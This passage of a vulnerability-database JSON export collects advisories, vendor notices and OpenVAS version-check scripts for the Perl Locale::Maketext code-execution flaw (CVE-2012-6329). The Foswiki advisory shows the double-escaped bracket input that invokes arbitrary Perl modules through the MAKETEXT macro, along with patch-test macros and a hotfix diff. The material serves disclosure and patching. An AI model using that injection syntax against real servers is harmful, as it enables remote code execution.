"perl Locale::Maketext code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2099-1\r\nFebruary 05, 2014\r\n\r\nperl vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nPerl could be made to run programs if it processed a specially crafted\r\nLocale::Maketext templates.\r\n\r\nSoftware Description:\r\n- perl: Practical Extraction and Report Language\r\n\r\nDetails:\r\n\r\nIt was discovered that Perl's Locale::Maketext module incorrectly handled\r\nbackslashes and fully qualified method names. 
An attacker could possibly\r\nuse this flaw to execute arbitrary code when an application used untrusted\r\ntemplates.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n perl-modules 5.14.2-13ubuntu0.3\r\n\r\nUbuntu 12.04 LTS:\r\n perl-modules 5.14.2-6ubuntu2.4\r\n\r\nUbuntu 10.04 LTS:\r\n perl-modules 5.10.1-8ubuntu2.4\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2099-1\r\n CVE-2012-6329\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-13ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-6ubuntu2.4\r\n https://launchpad.net/ubuntu/+source/perl/5.10.1-8ubuntu2.4\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:DOC:30295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30295", "title": "[USN-2099-1] Perl vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-6330", "CVE-2013-1666", "CVE-2012-6329"], "description": "\r\n\r\n---+ Security Alert: Code injection vulnerability in MAKETEXT macro\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext [1], which Foswiki uses to provide\r\ntranslations when {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. 
Because of this vulnerability it may be possible for a\r\nuser to invoke arbitrary perl modules on the server through a crafted \r\nmacro.\r\n\r\nThe original fix for this issue reported in\r\n[[SecurityAlert-CVE-2012-6329]] [2] failed to eliminate one possible\r\nattack vector. This CVE applies an additional fix for the original issue.\r\n\r\nThe system is *not vulnerable* if ={UserInerfaceInternationalization}= \r\nis not enabled in your configuration, or if =Locale::Maketext= has been\r\nupgraded to version 1.23 as advised in [[SecurityAlert-CVE-2012-6329]] [2].\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised.\r\n\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam [3] as documented in\r\nDevelopment.SecurityAlertProcess [4]\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll releases of Foswiki.\r\n * Foswiki-1.0.0 to Foswiki-1.0.10\r\n * Foswiki-1.1.0 to Foswiki-1.1.7\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2013-1666 [5] to this vulnerability.\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\nThe original report ( [[SecurityAlert-CVE-2012-6329]] [2]) against\r\nLocale::Maketext also identified another vector, where a module name can\r\nbe passed in to Locale::Maketext through the bracket notation. At the\r\ntime we determined that Foswiki was not vulnerable to this vector, as\r\nFoswiki does not permit that syntax to be used. 
__This was incorrect__.\r\nIt is possible to pass bypass the checks by double-escaping the brackets.\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server as the webserver user.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues: This CVE\r\naddresses an additional vector:\r\n * NEW *Execute arbitrary perl modules by escaping brackets within\r\nMAKETEXT =~~[Some::Module,~~]= (CVE-2013-1666)*\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext. (CVE-2012-6329)\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %MAKETEXT{}% not validating the parameter numbers supplied\r\nin the =[_nnn]= tokens. (CVE-2012-6330)\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin =[_nnn]= tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nApply one of these countermeasures:\r\n * Apply hotfix (see patch below).\r\n * Install Extensions.PatchItem12391Contrib [6]\r\n * Disable ={UserInerfaceInternationalization}= in your =!LocalSite.cfg=\r\n * Upgrade to Foswiki-1.1.8 once available.\r\n\r\nIn addition to the above, Locale::Maketext should be upgraded to version\r\n1.23.\r\n\r\nYou can verify that the patches are successful by using the following\r\ntwo lines in a test topic:\r\n\r\n * If a warning about MAKETEXT Rejected is displayed here, your system\r\nis patched for Item12285: %MAKETEXT{"[_101]"}%\r\n * If ==[quant,4,singular,plural]== is displayed at the end of this\r\nline, your system is patched for Item12391: <b><tt>%MAKETEXT{"\r\n~~[quant,4,singular,plural~~] "}%</tt></b>\r\n\r\nNote: If the 2nd line displays =~[quant,4,singular,plural~]= (shows the\r\n~ character) then your system is not patched, but is not vulnerable\r\nbecause Internationalization is disabled.\r\n\r\n---++ Authors and Credits\r\n\r\n * John Lightsey for disclosing the issue to the foswiki-security list.\r\n * CrawfordCurrie, PaulHarvey and GeorgeClark for 
contributing to the\r\nfix, the 1.1.8 release and advisory.\r\n * Members of the Foswiki security team for discussions and for\r\nediting this security advice.\r\n\r\n---++ Hotfix for Foswiki Production Release 1.1.0-1.1.7\r\n\r\nThe line numbers may vary between releases, but the two regular\r\nexpressions should be changed as shown below:\r\n\r\n=================( CUT )================\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:42.520780283 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:51.362682708 -0500\r\n@@ -25,8 +25,8 @@\r\n $str =~ s/\]/~]/g;\r\n\r\n # restore already escaped stuff:\r\n- $str =~ s/~~\[/~[/g;\r\n- $str =~ s/~~\]/~]/g;\r\n+ $str =~ s/~~+\[/~[/g;\r\n+ $str =~ s/~~+\]/~]/g;\r\n\r\n $max = 0;\r\n $min = 1;\r\n\r\n=================( CUT )================\r\n\r\n---++ Hotfix for Foswiki Production Release 1.0.0-1.0.10\r\n\r\nApply the above patch to Foswiki.pm, in the vicinity of line 4193\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2013-02-12 - User discloses issue to foswiki security mailing list\r\n(John Lightsey)\r\n * 2013-02-13 - Developer verifies issue (George Clark)\r\n * 2013-02-13 - Security team triage the issue (George Clark, Crawford\r\nCurrie, Paul Harvey)\r\n * 2013-02-13 - Developer fixes code (George Clark)\r\n * 2013-02-14 - Security team creates advisory with hotfix (George Clark)\r\n * 2013-xx-xx - Release Manager builds patch release (name)\r\n * 2013-02-14 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists (George Clark)\r\n * 2013-02-19 - Publish advisory in Support web and update all related\r\ntopics (George Clark)\r\n * 2013-02-19 - Reference to public advisory on Download page and\r\nKnown Issues (George Clark)\r\n * 2013-02-19 - Issue a public security advisory (vuln@secunia.com,\r\ncert@cert.org, bugs@securitytracker.com bugtraq@securityfocus.com\r\nfull-disclosure@lists.grok.org.uk) (name)\r\n\r\n---++ External Links\r\n\r\n[1] 
http://search.cpan.org/perldoc?Locale::Maketext\r\n[2] http://foswiki.org/Support/SecurityAlert-CVE-2012-6329\r\n[3] http://foswiki.org/Community/SecurityTaskTeam\r\n[4] http://foswiki.org/Development/SecurityAlertProcess\r\n[5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1666\r\n[6] http://foswiki.org/Extensions/PatchItem12391Contrib\r\n", "edition": 1, "modified": "2013-02-24T00:00:00", "published": "2013-02-24T00:00:00", "id": "SECURITYVULNS:DOC:29097", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29097", "title": "Foswiki Security: Alert CVE-2013-1666 - Remote Code Execution Vulnerability in MAKETEXT macro.", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "cvelist": ["CVE-2012-4991", "CVE-2012-6330", "CVE-2012-6329", "CVE-2012-5469"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:VULN:12791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12791", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-1758", "CVE-2013-1759", "CVE-2013-1466", "CVE-2013-0162", "CVE-2013-1666", "CVE-2012-6329", "CVE-2013-1362", "CVE-2013-1636"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2013-02-24T00:00:00", "published": "2013-02-24T00:00:00", "id": "SECURITYVULNS:VULN:12910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12910", "title": "Web applications security 
vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-04-30T18:21:05", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "\nF5 Product Development has assigned ID 416734 (BIG-IP), ID 474513 (BIG-IQ), and ID 474518 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Perl binary and library \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 - 12.1.2 \n11.6.1 HF1 \n11.5.4 HF4| Perl binary and library \nBIG-IP 
PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP DNS| None| 12.0.0 - 12.1.2| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Perl binary and library \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Perl binary and library \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Perl binary and library \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Perl binary and library \nBIG-IQ ADC| 4.5.0| None| Perl binary and library \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Perl binary and library \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Perl binary and library \nF5 iWorkflow| 2.0.0 - 2.0.2| 2.1.0| Perl binary and library\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. 
For more information about securing access to the system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-04-26T22:14:00", "published": "2014-11-25T21:29:00", "id": "F5:K15867", "href": "https://support.f5.com/csp/article/K15867", "title": "Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the system over a secure network and limit command line access to trusted users. 
For more information about securing access to the system, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-09-01T00:00:00", "published": "2014-11-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15867.html", "id": "SOL15867", "title": "SOL15867 - Perl vulnerabilities CVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-04T11:17:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2017-12-01T00:00:00", "published": "2014-02-11T00:00:00", "id": "OPENVAS:841704", "href": "http://plugins.openvas.org/nasl.php?oid=841704", "type": "openvas", "title": "Ubuntu Update for perl USN-2099-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2099_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for perl USN-2099-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841704);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:44:48 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for perl USN-2099-1\");\n\n tag_insight = \"It was discovered that Perl's Locale::Maketext module\nincorrectly handled backslashes and fully qualified method names. 
An attacker\ncould possibly use this flaw to execute arbitrary code when an application used\nuntrusted templates.\";\n\n tag_affected = \"perl on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 10.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2099-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2099-1/\");\n script_summary(\"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-6ubuntu2.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.10.1-8ubuntu2.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-13ubuntu0.3\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-31T00:00:00", "id": "OPENVAS:1361412562310865275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865275", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-0659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-0659\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"perl on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865275\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:13 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-0659\");\n script_name(\"Fedora Update for perl FEDORA-2013-0659\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", 
rpm:\"perl~5.16.2~237.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Gentoo Linux Local Security Checks GLSA 201410-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121275", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201410-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201410-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121275\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:55 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201410-02\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been reported in the Locale-Maketext module for Perl, which can be exploited by malicious users to compromise an application using the module.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201410-02\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201410-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"perl-core/Locale-Maketext\", unaffected: make_list(\"ge 1.230.0\"), vulnerable: make_list(\"lt 1.230.0\"))) != NULL) 
{\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/perl\", unaffected: make_list(\"ge 5.17.7\"), vulnerable: make_list(\"lt 5.17.7\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:1361412562310865373", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865373", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-1836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-1836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865373\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:33 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-1836\");\n script_name(\"Fedora Update for perl FEDORA-2013-1836\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 